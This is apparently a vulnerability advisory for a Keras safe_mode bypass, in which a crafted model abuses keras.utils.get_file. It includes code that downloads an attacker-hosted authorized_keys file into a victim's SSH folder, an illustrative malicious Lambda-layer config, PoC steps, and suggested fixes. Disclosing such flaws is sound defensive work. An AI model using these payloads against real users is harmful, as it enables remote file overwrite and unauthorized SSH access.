Description
Keras vulnerable to CVE-2025-1550 bypass via reuse of internal functionality
Summary
It is possible to bypass the mitigation introduced in response to CVE-2025-1550 when an untrusted Keras v3 model is loaded, even with “safe_mode” enabled, by crafting malicious arguments to built-in Keras modules.
The vulnerability is exploitable in the default configuration and does not depend on user input; it only requires an untrusted model to be loaded.
Impact
| Type | Vector | Impact |
|---|---|---|
| Unsafe deserialization | Client-side (when loading an untrusted model) | Arbitrary file overwrite; can lead to arbitrary code execution in many cases. |
Details
Keras’ safe_mode flag is designed to disallow unsafe lambda deserialization, specifically by rejecting any arbitrary embedded Python code marked with the “lambda” class name (see https://github.com/keras-team/keras/blob/v3.8.0/keras/src/saving/serialization_lib.py#L641).
A fix for the vulnerability, allowing deserialization of objects only from internal Keras modules, was introduced in commit bb340d6780fdd6e115f2f4f78d8dbe374971c930.
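For reference, the sketch below shows the behavior safe_mode is meant to guarantee; the file name is a hypothetical placeholder for any model that embeds arbitrary Python code in a Lambda layer.

```python
# Intended safe_mode behavior: a model embedding arbitrary Python code in a
# Lambda layer is rejected when safe_mode is enabled (the default).
# "untrusted_lambda_model.keras" is a hypothetical placeholder file name.
import keras

try:
    keras.saving.load_model("untrusted_lambda_model.keras")  # safe_mode=True by default
except ValueError as err:
    print("Rejected by safe_mode:", err)
```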
However, it is still possible to exploit model loading, for example by reusing the internal Keras function keras.utils.get_file and downloading remote files to an attacker-controlled location.
This allows for arbitrary file overwrite, which in many cases can also lead to remote code execution. For example, an attacker would be able to download a malicious authorized_keys file into the user’s SSH folder, giving the attacker full SSH access to the victim’s machine.
Since the model does not contain arbitrary Python code, this scenario is not blocked by “safe_mode”. It also bypasses the latest fix, since it uses a function from one of the approved modules (keras).
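In effect, loading such a model makes the victim’s machine run a call like the one below. The file name, URL, and paths are illustrative assumptions matching the SSH scenario above, while keras.utils.get_file itself is the real, allowed built-in being abused.

```python
# Roughly the call a crafted model can force during loading. The values are
# illustrative assumptions for the authorized_keys scenario described above.
# get_file() downloads `origin` into cache_dir/cache_subdir/fname.
from keras.utils import get_file

get_file(
    fname="authorized_keys",                            # attacker-chosen file name
    origin="https://attacker.example/authorized_keys",  # attacker-controlled URL (hypothetical)
    cache_dir="/home/victim/.ssh",                      # attacker-chosen destination (hypothetical path)
    cache_subdir=".",                                    # write directly under cache_dir
)
```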
Example
The PoC’s truncated config.json causes a remote file download from https://raw.githubusercontent.com/andr3colonel/when_you_watch_computer/refs/heads/master/index.js into the local /tmp folder by passing arbitrary arguments to Keras’ built-in function keras.utils.get_file().
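As a rough illustration, a fragment of such a config might look like the sketch below, written as a Python dict mirroring the JSON. The exact key layout of the original PoC config.json is an assumption; the essential point is that the serialized function reference resolves to the allowed built-in keras.utils.get_file and the arguments mapping supplies attacker-chosen parameters.

```python
# Illustrative Python-dict sketch of a Lambda-layer entry in config.json.
# The exact key layout of the real PoC is an assumption; the idea is that the
# function reference points at keras.utils.get_file (an "approved" module)
# and "arguments" carries attacker-controlled parameters for it.
lambda_layer_config = {
    "class_name": "Lambda",
    "config": {
        "name": "lambda",
        "function": {
            "module": "keras.utils",
            "class_name": "function",
            "config": "get_file",
        },
        "arguments": {
            "fname": "index.js",
            "origin": (
                "https://raw.githubusercontent.com/andr3colonel/"
                "when_you_watch_computer/refs/heads/master/index.js"
            ),
            "cache_dir": "/tmp",
            "cache_subdir": ".",
        },
    },
}
```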
PoC
- Download `malicious_model_download.keras` to a local directory.
- Load the model (a minimal loading sketch is shown below).
- Observe that a new file `index.js` was created in the `/tmp` directory.
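A minimal loading sketch for the second step, assuming malicious_model_download.keras sits in the current working directory; safe_mode is left at its default (enabled) value and, as described in the advisory, the download still happens during loading.

```python
# Minimal PoC loading sketch. Assumes malicious_model_download.keras has
# already been placed in the current working directory.
import os
import keras

# safe_mode=True is the default; it is passed explicitly to highlight the bypass.
keras.saving.load_model("malicious_model_download.keras", safe_mode=True)

# Loading the crafted model triggers keras.utils.get_file, so the
# downloaded file should now be present.
print(os.path.exists("/tmp/index.js"))  # expected: True
```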
Fix suggestions
- Add an additional flag `block_all_lambda` that allows users to completely disallow loading models with a Lambda layer.
- Audit the `keras`, `keras_hub`, `keras_cv`, `keras_nlp` modules and remove/block all “gadget functions” which could be used by malicious ML models.
- Add an additional flag `lambda_whitelist_functions` that allows users to specify a list of functions that are allowed to be invoked by a Lambda layer.
Credit
The vulnerability was discovered by Andrey Polkovnichenko of the JFrog Vulnerability Research team.
References
- https://github.com/keras-team/keras/security/advisories/GHSA-c9rc-mg46-23w3
- https://nvd.nist.gov/vuln/detail/CVE-2025-8747
- https://github.com/keras-team/keras/pull/21429
- https://github.com/keras-team/keras/commit/713172ab56b864e59e2aa79b1a51b0e728bba858
- https://jfrog.com/blog/keras-safe_mode-bypass-vulnerability
Packages
| Package | Vulnerable versions | Patched version |
|---|---|---|
| keras | >= 3.0.0, < 3.11.0 | 3.11.0 |
Related vulnerabilities
A safe mode bypass vulnerability in the `Model.load_model` method in Keras versions 3.0.0 through 3.10.0 allows an attacker to achieve arbitrary code execution by convincing a user to load a specially crafted `.keras` model archive.
Keras safe_mode bypass allows arbitrary code execution when loading a malicious model.